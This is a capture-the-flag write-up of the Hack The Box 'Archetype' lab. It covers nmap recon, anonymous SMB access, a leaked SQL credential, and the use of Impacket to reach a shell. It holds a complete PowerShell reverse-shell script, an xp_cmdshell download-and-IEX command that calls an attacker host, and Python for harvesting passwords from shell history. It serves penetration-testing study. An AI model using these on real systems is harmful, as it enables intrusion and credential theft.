Just started on Hack The Box; a few things had to be sorted out first
How to improve the VPN connection
First, port-scan the target with nmap
Four TCP ports are open: 135, 139, 445 and 1433 (1782 shows up as filtered)
445, 139: SMB. The scan already hints at weak spots: the SMB scripts ran as the guest account, SMB1 message signing is disabled and SMB2 signing is "enabled but not required", so anonymous share listing is worth trying
1433: Microsoft SQL Server 2017 RTM (14.00.1000.00) with no post-RTM patches applied, according to ms-sql-info
```text
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 20:27 CST
Nmap scan report for 10.10.10.27
Host is up (0.30s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE      VERSION
135/tcp  open     msrpc        Microsoft Windows RPC
139/tcp  open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open     ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-09-20T12:47:39
|_Not valid after:  2051-09-20T12:47:39
|_ssl-date: 2021-09-20T12:53:19+00:00; +25m03s from scanner time.
1782/tcp filtered hp-hcip
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h49m04s, deviation: 3h07m52s, median: 25m02s
| ms-sql-info:
|   10.10.10.27:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-09-20T05:53:08-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-09-20T12:53:04
|_  start_date: N/A
```
That gives a lot of host information: hostname ARCHETYPE, workgroup WORKGROUP, Windows Server 2019 build 17763, no domain
Since 445 is open, try listing the shares anonymously with smbclient (-N sends no password, -L lists shares):

```shell
smbclient -N -L 10.10.10.27
```
```text
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
```
smbclient usage summary
The other three shares (ADMIN$, C$, IPC$) are not readable anonymously; only backups is
```text
smbclient -N \\\\10.10.10.27\\backups
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 20:20:57 2020
  ..                                  D        0  Mon Jan 20 20:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 20:23:02 2020

                10328063 blocks of size 4096. 8260445 blocks available
```
The share holds a single SSIS package configuration, prod.dtsConfig (pull it down with smbclient's get command). The connection string inside it carries a user ID and a clear-text password:

```xml
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
```

Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
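Reading one file by eye is fine, but backup shares often hold many .dtsConfig files. As an added example (not code from the original post), the Python below parses a DTS configuration file, walks every Configuration property, and pulls out any connection string that embeds a user and password. The XML is a copy of the prod.dtsConfig shown above, embedded so the script runs offline; the connection-string tokenizer handles values wrapped in quotes or braces, which can contain ';' and break a naive split. The `impacket_target` helper is my own: it only rewrites DOMAIN\user into the `[domain/]user@host` target syntax that Impacket's example scripts accept, with 10.10.10.27 being the target from the scan (the file's Data Source of "." means "the local instance", so the host has to come from recon, not from the file).

```python
import xml.etree.ElementTree as ET

# Copy of prod.dtsConfig from the backups share (embedded so this runs offline).
PROD_DTSCONFIG = r"""<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>"""


def parse_connection_string(conn: str) -> dict:
    """Split an OLE DB / ADO.NET style connection string into a dict.

    Values wrapped in '...', "..." or {...} may themselves contain ';',
    so a plain split(';') would break them; this walks the string instead.
    """
    out, i, n = {}, 0, len(conn)
    while i < n:
        eq = conn.find("=", i)
        if eq == -1:
            break
        key = conn[i:eq].strip()
        i = eq + 1
        if i < n and conn[i] in "'\"{":
            close = "}" if conn[i] == "{" else conn[i]
            end = conn.find(close, i + 1)
            end = n if end == -1 else end
            value = conn[i + 1:end]
            nxt = conn.find(";", end)
            i = n if nxt == -1 else nxt + 1
        else:
            end = conn.find(";", i)
            end = n if end == -1 else end
            value = conn[i:end].strip()
            i = end + 1
        if key:
            out[key] = value
    return out


def extract_credentials(xml_text: str) -> list:
    """Return one record per <Configuration> whose ConfiguredValue carries a user/password."""
    found = []
    for cfg in ET.fromstring(xml_text).iter("Configuration"):
        value = cfg.findtext("ConfiguredValue") or ""
        kv = {k.lower(): v for k, v in parse_connection_string(value).items()}
        user = kv.get("user id") or kv.get("uid")
        password = kv.get("password") or kv.get("pwd")
        if user is None and password is None:
            continue  # property without embedded credentials
        found.append({
            "path": cfg.get("Path", ""),
            "data_source": kv.get("data source") or kv.get("server") or "",
            "user": user,
            "password": password,
        })
    return found


def impacket_target(user: str, host: str) -> str:
    """Rewrite 'DOMAIN\\user' as the [domain/]user@host form Impacket's examples accept."""
    domain, _, username = user.rpartition("\\")
    return f"{domain}/{username}@{host}" if domain else f"{username}@{host}"


if __name__ == "__main__":
    for cred in extract_credentials(PROD_DTSCONFIG):
        print(f"{cred['path']}: user={cred['user']} password={cred['password']} "
              f"(Data Source={cred['data_source']})")
        # Data Source '.' is the local instance, so the host comes from the scan, not the file
        print("  mssqlclient.py", impacket_target(cred["user"], "10.10.10.27"), "-windows-auth")
```

Point it at any .dtsConfig you find by replacing PROD_DTSCONFIG with the file's contents; the `user id`/`uid` and `password`/`pwd` key pairs cover both the long and short forms the SQL Native Client provider accepts.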
Try those credentials against the SQL Server with Impacket's mssqlclient.py. The account is a Windows login (ARCHETYPE\sql_svc, not a SQL login), hence -windows-auth; the script prompts for the password:

```shell
python3 mssqlclient.py sql_svc@10.10.10.27 -windows-auth
```

The connection succeeds and gives a SQL shell on the instance, with whatever rights that login has
The current user is archetype\sql_svc
I. [Attempt] Check whether a Cobalt Strike beacon can call back
The attempt failed; not even dnslog got through. I suspect a problem with the target box.
II. Reverse shell
1. Create the reverse shell script:
shell.ps1

```powershell
# shell.ps1: connect back to the Kali listener and run whatever it sends
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.45",443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    # decode the received command, execute it, and send stdout+stderr back with a "# " prompt
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2 = $sendback + "# "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
```

The IP here (and the port, 443) must be changed to your own Kali VPN address
2. In the folder holding the script, serve it over HTTP with Python:

```shell
sudo python3 -m http.server 80
```

Listen on the port set in the script:

```shell
sudo nc -lvnp 443
```
3. Trigger the callback from the mssqlclient shell obtained earlier. xp_cmdshell runs an OS command as the SQL Server service account; it is disabled by default, so if this EXEC is rejected with a "component turned off" error, run mssqlclient.py's enable_xp_cmdshell command first (that needs sysadmin rights on the instance). The echoed PowerShell fetches shell.ps1 from the Kali web server and runs it in memory with IEX, so nothing is written to disk:

```sql
EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.45/shell.ps1") | powershell -noprofile'
```

The shell comes back on the nc listener:
The first flag, user.txt, is on the desktop:

```text
# cd desktop
# ls

    Directory: C:\Users\sql_svc\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/25/2020   6:37 AM             32 user.txt

# more user.txt
3e7b102e78218e935bf3f4951fec21a3
# ^C
```
Next, administrator privileges are needed
The administrator password turned up in the command history; psexec.py then gives an administrator shell
With a low-privileged user in hand, look at how to reach administrator. As seen above, archetype\sql_svc wears three hats: ordinary OS user, database login, and the account the SQL Server service runs as. Service accounts like this often have more reach than other normal users (running privileged commands, reading files others cannot), and their interactive use leaves traces, so check the PowerShell history. PSReadLine keeps it on disk per user at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, independent of Get-History, which only covers the current session.
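Reading a history file by hand works for one user, but the same hunt applies to every profile on a box. As an added example (not code from the original post), the Python below scans PSReadLine history text for commands that put a secret on the command line: `net use ... /user:x password`, `net user x password /add`, `ConvertTo-SecureString ... -AsPlainText`, and generic `-Password`/`-p`/`/p:` switches. The history path is the standard one named above; the sample history, account names and passwords in it are constructed for illustration and are not taken from the target. `scan_profiles` is meant to be run on the Windows host itself (for example through the reverse shell's PowerShell, or after copying the files back to Kali).

```python
import glob
import ntpath
import re

# PSReadLine writes each user's PowerShell history to
#   %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
HISTORY_RELATIVE = ntpath.join("AppData", "Roaming", "Microsoft", "Windows",
                               "PowerShell", "PSReadLine", "ConsoleHost_history.txt")

# Constructed sample history for illustration; names and passwords are made up,
# not taken from the target. Line 2 is the shape of command this hunt is after.
SAMPLE_HISTORY = r"""Get-ChildItem C:\backups
net.exe use T: \\Archetype\backups /user:administrator Passw0rd!
net user backupsvc B4ckup!2020 /add
$p = ConvertTo-SecureString "Summer2021!" -AsPlainText -Force
psexec.exe \\dc01 -u CORP\bob -p Winter2020 cmd.exe
net use \\fileserver\share /user:CORP\alice *
exit
"""

# (label, regex) pairs; each regex names a 'secret' group and optionally a 'user' group.
PATTERNS = [
    # net use \\host\share /user:DOMAIN\name password
    ("net use", re.compile(r"""\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>\S+)""", re.I)),
    # net user name password /add
    ("net user", re.compile(r"""\bnet(?:\.exe)?\s+user\s+(?P<user>[^\s/]+)\s+(?P<secret>[^\s/]+)""", re.I)),
    # ConvertTo-SecureString 'plain' -AsPlainText -Force
    ("ConvertTo-SecureString", re.compile(
        r"""ConvertTo-SecureString\s+(?:-String\s+)?['"]?(?P<secret>[^'"\s]+)['"]?(?=.*-AsPlainText)""", re.I)),
    # -Password x, -p x, /p:x, /password:x style switches on arbitrary tools
    ("password switch", re.compile(
        r"""(?:-Password\b|-p\b|/p(?:ass(?:word)?)?:)\s*['"]?(?P<secret>[^'"\s]+)""", re.I)),
]


def find_credentials(history_text: str) -> list:
    """Return one record per history line that embeds a secret on the command line."""
    hits = []
    for n, line in enumerate(history_text.splitlines(), 1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if not m or m.group("secret") == "*":   # '*' means "prompt me", nothing leaked
                continue
            hits.append({"line": n, "kind": kind, "user": m.groupdict().get("user"),
                         "secret": m.group("secret"), "command": line.strip()})
            break  # one finding per line is enough
    return hits


def history_path(profile_dir: str) -> str:
    """Path of ConsoleHost_history.txt for a given Windows profile directory."""
    return ntpath.join(profile_dir, HISTORY_RELATIVE)


def scan_profiles(users_root: str = r"C:\Users") -> dict:
    """On the target itself: read every reachable user's history and collect findings."""
    results = {}
    for profile in glob.glob(ntpath.join(users_root, "*")):
        try:
            with open(history_path(profile), encoding="utf-8", errors="replace") as fh:
                hits = find_credentials(fh.read())
        except OSError:
            continue  # no history file, or no permission for that profile
        if hits:
            results[profile] = hits
    return results


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_HISTORY):
        print(f"line {hit['line']:>3} [{hit['kind']}] user={hit['user']} secret={hit['secret']}")
        print(f"          {hit['command']}")
```

The `*` check matters: `net use ... /user:x *` tells Windows to prompt for the password, so that line records a user but leaks nothing, and a scanner that does not skip it reports a false positive. As a low-privileged user you will normally only be able to read your own history file; the point of scanning it is that service accounts are often used interactively by administrators, which is exactly what the write-up relies on.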
Connect with psexec.py. It takes the same user@host syntax as mssqlclient.py and prompts for the password; because it writes a service executable into the ADMIN$ share and starts it remotely, it needs an account that is a local administrator, which is why the recovered administrator credential is what makes this step work.
The second flag is on the administrator's desktop
1. Approach: nmap for recon; port 445 is usable anonymously and SQL Server is listening; collect host information, use the leaked credentials to reach the database service, get the mssqlclient shell, trigger a reverse shell, escalate, and collect both flags
2. Impacket usage
3. Reverse shell steps and generating the payload
Quick reverse shell generation
powercat
4. The SMB protocol
https://blog.csdn.net/ZiXuanFY/article/details/52513512?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link
First box done